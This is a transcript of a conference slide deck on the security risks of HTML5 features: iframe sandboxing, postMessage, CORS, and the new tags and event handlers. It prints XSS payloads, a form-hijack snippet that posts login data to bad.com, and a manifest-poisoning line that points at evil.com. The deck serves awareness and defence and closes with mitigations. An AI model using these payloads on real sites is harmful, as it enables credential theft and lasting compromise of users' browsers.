HTML5 a clear & present danger - Iv2 technologies · HTML5 a clear & present danger Renaud Bidou...

Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 1 1/29/2014 Deny All © 2013 1

HTML5

a clear & present danger

Renaud Bidou

CTO


Menu

1. HTML5 new capabilities

2. HTML5 tricks

3. Empowering common threats

4. Hackers’dreams come true

Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 3 1/29/2014 Deny All © 2013 3 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 3

What’s new with HTML5


• Project led by W3C

• Latest draft: HTML 5.1 – May 2, 2013 – Previous : December 17, 2012

– Previously : 13 drafts starting from January 22, 2008

• Why HTML5 ? – Make HTML content natively dynamic

– Support offline mode

– Increase security control and tuning

– Improve internals for performance, task parallelization etc.

HTML5 short history


• On-the-fly graphics with the <canvas> tag

• Native MP3, Ogg and Wav audio format support with the <audio> tag

• Native MP4, WebM and Ogg video format support with the <video> tag

• Drag & Drop ! with draggable attribute and

ondrop event handler

• Embedded geolocation with the new getCurrentPosition() method

New HTML content


• New input types through <input type> attribute

– Email : type="email"

– URL: type="url"

– Numbers: type="number" type="range"

– Date: type="date" type="month" type="week"

• Embedded format validator

– Based on type attribute value

– Can be enforced through the pattern attribute

– Can be disabled… don’t try to understand…

Input Validation

<form novalidate>


New forms inputs

<input type="email">

<input type="url">

<input pattern="d{4}"

placeholder="4 digits PIN">

<input type="number" min="0"

max="10" step="2" value="6">


• Web Workers enable JavaScript background

processing

• Web Storage improves local storage to

extend the cookie concept and natively

support session-based data handling

• WebApp Cache to enable offline mode of

Web/Cloud based applications

• Server Sent Events (SSE) enables Server to

Client communication through the

established connection

New HTML internals


HTML5 new security tricks


• iFrames sandboxing

– forbids forms, scripts, popups, access to cookies,

local storage

– considers the content being provided by another

domain

• iFrame sandboxes are not set by default

– Backward compatibility

– sandbox attribute to be explicitly set without value

iFrame Sandboxing

<iframe src="iframe-source.html" sandbox="">

Not natural at all


• Cross-document messaging

– provides mechanism for iframes to communicate with

parent document

– overrides HTML4 restrictions

• Implementation failure

– Parent frame to control sources of messages

– Rarely (never) performed

– Origin iframe identification not even enforced

Cross-document messaging

window.parent.postMessage('hello', '*'); Origin iFrame ID

Wildcards are valid

& Recommended


• Sandboxes are not applied

– iFrames provide access to local storage

– iFrames allows script execution and forms

• Thanks to cross-document messaging

– iFrames communicate with parent window

iFrame insecurity

HTML5 opens doors between iframes and parents


• Cross-Origin Resource Sharing

• Required for « modern » applications

• Browsers to handle 3rd party domains content handling

CORS

1 2

Site A Site B

Main page

Request for 3rd party content

HTML5 powered browser


CORS tricky concept

• CORS « security » controls

1 2

Site A Site B GET / HTTP/1.1

Host: Site_A

HTTP/1.1 200 OK

GET /content.htm HTTP/1.1

Host: Site_B

Origin: http://Site_A

HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://Site_A

• rely on

– Origin and Access-Control-Allow-Origin headers

– Relevant access control implemented on server

– Client Server trust relationship

??????????????


• Access control

– No implementation standard

– Often set as site-level through includes or left universal

• Preflighted requests

– Inform about supported methods

– Define security policy set on browser

– Responses are cached on client

CORS Security Issues

Access-Control-Allow-Origin: *

No reliable access control on server

Browsers will not update their security policy


1. CORS obsoletes SOP

The Gig

« Native » browsing on internal networks

Powerful DoS capabilities

Accurate network (IP, port) scan behind the firewall

Etc.

2. iFrames are out of control

Browsers are turned into proxies


Empowering usual attacks


• 31 HTML5 new tags

– 31 new injections vectors supported by browsers

• 52 + 1 HTML5 new script event handlers

– 52 on* injection points

+ formaction : will bypass on\w+= like filters

Injections heaven

<audio> <canvas> <command> <embed> <nav> <param> <source>

<ruby> <track> <video> …

<form id="test" />

<button form="test" formaction="javascript:alert(1)">

Thousands of new evasion combinations


• Self-triggering execution through autofocus

Attributes you will love

<input type="text" value="" onfocus="alert(1)" autofocus>

<body onscroll=alert(1)>

<br><br><br><br><br><br>...<br><br><br>

<input autofocus>

<form action="" method="post">

<input name="username" value="admin" />

<input name="password" type="password" value="secret" />

<input name="captcha" value="" dirname="password"/>

<input type="submit">

</form>

• Overwrite userinput with dirname

username=admin&password=ltr&captcha=

Stealth user abuses

– Can be efficiently combined with appropriate handlers


• Abusing the D&D API

– Have a user drag & drop something

• Image, text, browser element (scrollbar, slider etc.)

– Set the value of dragged element to whatever you want

• Malicious data to be submitted on behalf of the user

• Confidential data to be stolen

– Have an invisible element follow the mouse

– Set the ondrop event handler of the iFrame to whatever …

• Feed form content (with malicious data) : CSRF

• Send content (stolen data) to 3rd party : Cross-domain data leak

Drag&Drop Jacking

Bypasses cross-domain & CSRF protections


• External forms content definition

– Thanks to the form & formaction attributes

– Can also be used to bypass CSRF protections

– Not that subtile, but still smarter than average users…

S’more Clickjacking

<form id='auth' action='/login'>

<input type='text' placeholder='login'>

<br><input type='password' placeholder='password'>

<br><input type='submit' value='Enter‘>

</form>

<input form='auth' type='submit' value='Enter HERE'

formaction='http://bad.com/thanks' >

Trivial data theft & CSRF protections bypass


• Screenshots with XSS

– Thanks to <canvas> tag…

XSS Unleashed

5. Hacker retrieves screenshot

2. Malicious Javascript is loaded on Victim

4. Victim sends screenshot

3. Victim executes Javascript

1. Hacker exploits XSS vulnerability

Hacker

Vulnerable App Victim Browser

Relay


• Bi-directional communication channel – Server-Side Events to change web-based botnets behaviour

• Past : – Agent regularly connect to C&C channel :

• to get commands and provide output

• « Easy » to identify and sign

– Threat is in out • Efficiently addressed with outgoing proxies

• Now: – No recurring connections to C&C channel

• Commands sent by server / responses sent asynchronously

• No standard behaviour to modelize

– Threat is out in • Not addressed by web client security devices

BotnetNG

Botnet prevention mechanisms are obsolete


HTML5 Inside


• A botnet case study – Targets clients connected to compromised application

– Used to crack passwords

• Takes advantage of Web Workers – Browsers compute hashes in the background

– Invisible to user, no impact on browser performances

• Just theory ? – Ravan, Distributed JS Computing Systems

– Supports MD5 and SHA hashes

– Simply a PoC, user are asked for permission

Password cracking

Web hackers’ version of distributed computing


• Issues with injections – Volatile: limited timeframe

– Persistent: can be removed from compromised DB

• The Hacker’s dream – Persistent injections for unlimited timeframe

– Client-side persistency to prevent one-shot removal

• WebApp cache: HTML5 gift to the underground – local HTML5 storage

– Independant from browser cache

• Not so easy to clean, whenever possible

– Prevents any request from the client

– Allow to cache anything, including the root of the application

Dream comes True


• Browser requests a page

WebApp Cache

GET / HTTP/1.1

<!DOCTYPE HTML>

<html manifest="site.appcache">

…

<html> Manifest file URL

• Browser gets the Manifest file

– Specifies pages to be locally cached

– Some more stuff

• Browser stores the files

– Never to be requested again


• One Scenario

– Exploit a client-side injection vulnerability on a server (XSS)

• Can be volatile, will be used just once

– Have the client browser execute something like

The Ultimate APT

document.getElementsByTagName("html")[0]\

.setAttribute("manifest","http://evil.com/bad.manifest");

Changes the manifest attribute to

– Set an entry in the corrupted manifest file to a corrupted file

• with « alternate » capabilties such as fishing or drive-by download

Client access to application compromised forever


Conclusion


HTML5 opens doors between iframes and parents

Browsers are turned into proxies

Thousands of new evasion combinations


• Identify new HTML5 content – Tags, attributes, event handlers

• Identify previoulsy defined HTML5 content – Now removed from recent drafts

– Still supported by browsers

• Evaluate suspicious combinations – Tag name + attribute + event handler

• Efficiently identify script injections – Don’t try to understand (you can’t)

– Identify the nature of data submitted to your application

• Enforce access restrictions – In the core of applications for Cross-Document Messaging

– At the server level for CORS security

Preventing HTML5 abuses


Thank you!

[email protected]

+33 1 46 20 96 00

mailto:[email protected]

HTML5 a clear & present danger - Iv2 technologies · HTML5 a clear & present danger Renaud Bidou...

Documents

Transcript of HTML5 a clear & present danger - Iv2 technologies · HTML5 a clear & present danger Renaud Bidou...